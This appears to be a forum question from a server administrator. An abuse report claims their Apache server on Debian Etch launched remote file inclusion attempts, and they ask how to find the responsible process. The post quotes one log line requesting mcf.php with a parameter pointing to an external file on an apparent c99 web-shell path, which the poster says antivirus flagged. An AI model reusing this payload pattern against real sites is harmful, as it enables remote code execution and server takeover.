My network administration received a abuse report from a host claiming that one of my servers tried to execute actions like this:
"GET //mcf.php?content=http://jonyrulz.com/c99/id2.txt????? HTTP/1.1" 403 1029 "libwww-perl/5.805"
I am using Debian 4 etch in this server which is running Apache in production.
How can I check my logs in order to see which application requested these actions?
Obs.: Avira antivirus accused viruses in
http://jonyrulz.com/c99/id2.txt